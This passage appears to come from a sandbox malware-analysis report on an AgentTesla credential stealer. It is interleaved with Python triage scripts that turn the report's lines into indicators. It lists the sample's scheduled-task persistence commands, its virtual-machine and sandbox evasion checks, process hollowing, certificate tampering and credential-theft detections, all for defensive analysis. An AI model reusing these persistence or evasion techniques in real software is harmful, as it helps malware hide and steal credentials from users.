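# Constructed events modelled on the report's lines, plus one benign control at the end.
SAMPLE_EVENTS = [
    {"type": "process",
     "parent": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "image": r"C:\Users\Public\vbc.exe", "cmdline": r"'C:\Users\Public\vbc.exe'"},
    {"type": "process", "parent": r"C:\Users\Public\vbc.exe",
     "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r"'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmpB2BC.tmp'"},
    {"type": "registry", "image": r"C:\Users\Public\vbc.exe",
     "target": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\MLdAu"},
    {"type": "file", "image": r"C:\Users\Public\vbc.exe",
     "target": r"C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe:Zone.Identifier",
     "access": "read attributes | delete"},
    {"type": "process", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r"schtasks.exe /Create /TN 'Backup' /XML 'C:\ProgramData\Backup\task.xml'"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print("%-5s %-26s %s" % (f["severity"], f["rule"], f["detail"]))
```

The schtasks rule keys on the two things the report actually shows: the task body arrives as /XML from %LocalAppData%\Temp, and the creator runs from a user-writable path; an administrator creating a task from a system path with an XML in a fixed location does not fire it. Note that the Run value and the task name point at different drops (MLdAu\MLdAu.exe, and a task named after the second dropped binary WzyRXCWtdGSdEA.exe, whose XML body the report does not show), so both need to be collected when scoping a host.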
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior (9 identical entries)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior (4 identical entries)
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior (79 identical entries)
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process information set: NOOPENFILEERRORBOX Jump to behavior (106 identical entries)
Source: Doc2.xlsx Stream path 'EncryptedPackage' entropy: 7.99880681599 (max. 8.0)

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2964, type: MEMORY
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vbc.exe, 00000006.00000002.2229803981.0000000002311000.00000004.00000001.sdmp, MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: vbc.exe, 00000006.00000002.2229803981.0000000002311000.00000004.00000001.sdmp, MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Contains long sleeps (>= 3 min)
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\Public\vbc.exe Window / User API: threadDelayed 9502 Jump to behavior
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Window / User API: threadDelayed 9500
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1952 Thread sleep time: -360000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 1276 Thread sleep time: -60000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2408 Thread sleep time: -60000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 1028 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 1028 Thread sleep time: -150000s >= -30000s
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe TID: 1312 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe TID: 856 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe TID: 2480 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe TID: 2260 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe TID: 2156 Thread sleep time: -360000s >= -30000s
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe TID: 1304 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe TID: 1304 Thread sleep time: -150000s >= -30000s
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe TID: 1272 Thread sleep count: 9500 > 30
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe TID: 1272 Thread sleep count: 245 > 30
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe TID: 1304 Thread sleep count: 104 > 30
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Last function: Thread delayed
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Thread delayed: delay time: 30000
Source: MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmp Binary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
Source: MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmp Binary or memory string: vmware
Source: MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: vbc.exe, 00000006.00000002.2233213372.0000000005223000.00000004.00000001.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation

Anti Debugging:

Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process token adjusted: Debug
Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes
Source: C:\Users\Public\vbc.exe Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Memory written: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Memory written: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe base: 400000 value starts with: 4D5A
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmpB2BC.tmp'
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe {path}
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmp7511.tmp'
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process created: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe {path}
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmp74F2.tmp'
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Process created: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe {path}
Source: vbc.exe, 00000009.00000002.2370335356.0000000000CA0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: vbc.exe, 00000009.00000002.2370335356.0000000000CA0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000009.00000002.2370335356.0000000000CA0000.00000002.00000001.sdmp Binary or memory string: !Progman
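The sandbox-evasion lines earlier in the report (long sleeps, WMI hardware queries, SBIEDLL.DLL / VMware strings) and the hollowing and persistence lines in this section are free text. The following Python is an added example, not part of the report or of Joe Sandbox's tooling: it parses lines of that format and reduces them to the indicators an analyst pivots on (sleep values at or above the 3 minute threshold, VM-fingerprinting WMI classes, a process that spawns its own image and then writes an MZ header at 0x400000 in the child, the schtasks task name and XML path, and the AuthRoot thumbprint). The sample input is constructed from lines copied from this report; the treatment of the report's "-150000s" style values as millisecond magnitudes, the self-hollowing heuristic, and the reading of 922337203685477 ms as Int64.MaxValue ticks are the example's own assumptions.

```python
"""Triage helper for Joe Sandbox style behaviour lines (added example, not report code)."""
import re
from collections import defaultdict

# Constructed sample input: lines copied from this report, "Jump to behavior" link text removed.
SAMPLE_LINES = r"""
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\vbc.exe TID: 1028 Thread sleep time: -150000s >= -30000s
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
Source: vbc.exe, 00000006.00000002.2229803981.0000000002311000.00000004.00000001.sdmp, MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe {path}
Source: C:\Users\Public\vbc.exe Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmpB2BC.tmp'
Source: C:\Users\Public\vbc.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Blob
"""

KINDS = ("Thread delayed", "Thread sleep time", "WMI Queries", "Memory written",
         "Process created", "Registry key created or modified", "Binary or memory string")
# "Source: <process or dump> [TID: n] <kind>: <detail>"; the source is matched lazily
# because the report's paths (C:\Program Files\...) may contain spaces.
EVENT_RE = re.compile(r"^Source: (?P<src>.+?)(?: TID: \d+)? (?P<kind>"
                      + "|".join(re.escape(k) for k in KINDS) + r"): (?P<detail>.*)$")
TASK_RE = re.compile(r"/Create /TN '(?P<task>[^']+)' /XML '(?P<xml>[^']+)'")
AUTHROOT_RE = re.compile(r"SystemCertificates\\AuthRoot\\Certificates\\([0-9A-Fa-f]{40})")
MEMWRITE_RE = re.compile(r"(?P<target>.+?) base: (?P<base>[0-9A-Fa-f]+) value starts with: (?P<magic>[0-9A-Fa-f]+)")

# WMI classes and strings the report itself flags as VM / sandbox fingerprinting.
VM_WMI_CLASSES = {"Win32_Processor", "Win32_NetworkAdapter", "Win32_NetworkAdapterConfiguration",
                  "Win32_Bios", "Win32_BaseBoard"}
SANDBOX_STRINGS = ("SBIEDLL.DLL", "WINE_GET_UNIX_FILE_NAME", "VMWARE")
LONG_SLEEP_MS = 3 * 60 * 1000            # the report's ">= 3 min" threshold
TIMESPAN_MAX_MS = (2**63 - 1) // 10_000  # Int64.MaxValue ticks expressed in whole ms


def parse_events(text):
    """Turn report lines into dicts with src / kind / detail; lines of other shapes are skipped."""
    return [m.groupdict() for m in (EVENT_RE.match(line.strip()) for line in text.splitlines()) if m]


def describe_delay(ms):
    """Classify a delay value (ms) the way an analyst reading the sleep lines would."""
    if ms == TIMESPAN_MAX_MS:
        # 922337203685477 == Int64.MaxValue / 10000 ticks per ms: consistent with a .NET
        # TimeSpan.MaxValue delay, i.e. a thread that never wakes on its own (assumption).
        return "TimeSpan.MaxValue (never expires)"
    if ms >= LONG_SLEEP_MS:
        return f"long sleep ({ms // 60000} min)"
    return f"short sleep ({ms} ms)"


def triage(text):
    """Reduce behaviour lines to the indicators an analyst pivots on."""
    long_sleeps, vm_classes = defaultdict(list), defaultdict(set)
    sandbox_strings, created, mz_written = set(), defaultdict(set), set()
    persistence, thumbprints = [], []
    for ev in parse_events(text):
        src, kind, detail = ev["src"], ev["kind"], ev["detail"]
        if kind in ("Thread delayed", "Thread sleep time"):
            # Assumption: "-150000s" style values are magnitudes in ms; the report's
            # -30000 cutoff lines up with its 30 second evasion threshold.
            ms = int(re.search(r"\d+", detail).group())
            if ms >= LONG_SLEEP_MS:
                long_sleeps[src].append(ms)
        elif kind == "WMI Queries":
            cls = re.search(r"\b(Win32_\w+)", detail)
            if cls and cls.group(1) in VM_WMI_CLASSES:
                vm_classes[src].add(cls.group(1))
        elif kind == "Binary or memory string":
            sandbox_strings.update(s for s in SANDBOX_STRINGS if s in detail.upper())
        elif kind == "Process created":
            # Image path is the token before the command line (these paths have no spaces).
            created[src].add(detail.split(" ", 1)[0].lower())
            task = TASK_RE.search(detail)
            if task:
                persistence.append((task["task"], task["xml"]))
        elif kind == "Memory written":
            m = MEMWRITE_RE.match(detail)
            if m and m["base"].lower() == "400000" and m["magic"].upper() == "4D5A":
                mz_written.add((src, m["target"].lower()))
        elif kind == "Registry key created or modified":
            thumbprints.extend(AUTHROOT_RE.findall(detail))
    # Self-hollowing heuristic: a process spawns its own image and then writes an MZ
    # header at the child's default image base (0x400000), which is what the report's
    # "Creates a process in suspended mode" and "Injects a PE file" lines show together.
    hollowing = sorted({src for src, tgt in mz_written if tgt in created.get(src, ())})
    return {
        "long_sleeps": dict(long_sleeps),
        "vm_fingerprinting": {k: sorted(v) for k, v in vm_classes.items()},
        "sandbox_strings": sorted(sandbox_strings),
        "hollowing": hollowing,
        "persistence": persistence,
        "authroot_thumbprints": thumbprints,
    }


if __name__ == "__main__":
    result = triage(SAMPLE_LINES)
    for key, value in result.items():
        print(f"{key}: {value}")
    for proc, delays in result["long_sleeps"].items():
        print(proc, [describe_delay(d) for d in delays])
```

Run as a script it prints the indicator summary for the embedded sample; to use it on a full report, paste the "Source:" lines of the behaviour sections into `triage`. The schtasks task name, the XML path under %TEMP% and the AuthRoot thumbprint are the values to carry straight into a host sweep, and the hollowing pair is the behaviour a Sysmon process-create plus process-access rule would need to tie together.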

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Queries volume information: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Queries volume information: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Queries volume information: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe Queries volume information: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe VolumeInformation
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Adds / modifies Windows certificates
Source: C:\Users\Public\vbc.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Blob

Stealing of Sensitive Information:

Yara detected AgentTesla
Source: Yara match File source: 12.2.MLdAu.exe.328e310.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.MLdAu.exe.30ee310.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.vbc.exe.340e310.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.MLdAu.exe.30ee310.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.MLdAu.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.MLdAu.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.vbc.exe.340e310.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.MLdAu.exe.328e310.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000012.00000002.2336318504.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2341517856.0000000003191000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2369735651.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2369629595.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2342137023.0000000002FF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2230917923.00000000034B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2230665557.0000000003311000.00000004.00000001.sdmp, type: MEMORY
Yara detected AgentTesla
Source: Yara match File source: 12.2.MLdAu.exe.328e310.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.MLdAu.exe.30ee310.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.vbc.exe.340e310.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.MLdAu.exe.30ee310.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.MLdAu.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.MLdAu.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.vbc.exe.340e310.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.MLdAu.exe.328e310.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000012.00000002.2336318504.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2341517856.0000000003191000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2369735651.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2369629595.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2370313444.0000000001FD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2342137023.0000000002FF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2338492595.0000000002261000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2230917923.00000000034B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2230665557.0000000003311000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2148, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2964, type: MEMORY
Yara detected Credential Stealer
Source: Yara match File source: 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2370313444.0000000001FD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2338492595.0000000002261000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2148, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla
Source: Yara match File source: 12.2.MLdAu.exe.328e310.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.MLdAu.exe.30ee310.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.vbc.exe.340e310.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.MLdAu.exe.30ee310.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.MLdAu.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.MLdAu.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.vbc.exe.340e310.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.MLdAu.exe.328e310.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000012.00000002.2336318504.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2341517856.0000000003191000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2369735651.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2369629595.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2342137023.0000000002FF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2230917923.00000000034B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2230665557.0000000003311000.00000004.00000001.sdmp, type: MEMORY
Yara detected AgentTesla
Source: Yara match File source: 12.2.MLdAu.exe.328e310.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.MLdAu.exe.30ee310.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.vbc.exe.340e310.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.MLdAu.exe.30ee310.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.MLdAu.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.MLdAu.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.vbc.exe.340e310.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.MLdAu.exe.328e310.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000012.00000002.2336318504.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2341517856.0000000003191000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2369735651.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2369629595.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2370313444.0000000001FD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2342137023.0000000002FF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2338492595.0000000002261000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2230917923.00000000034B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2230665557.0000000003311000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2148, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2964, type: MEMORY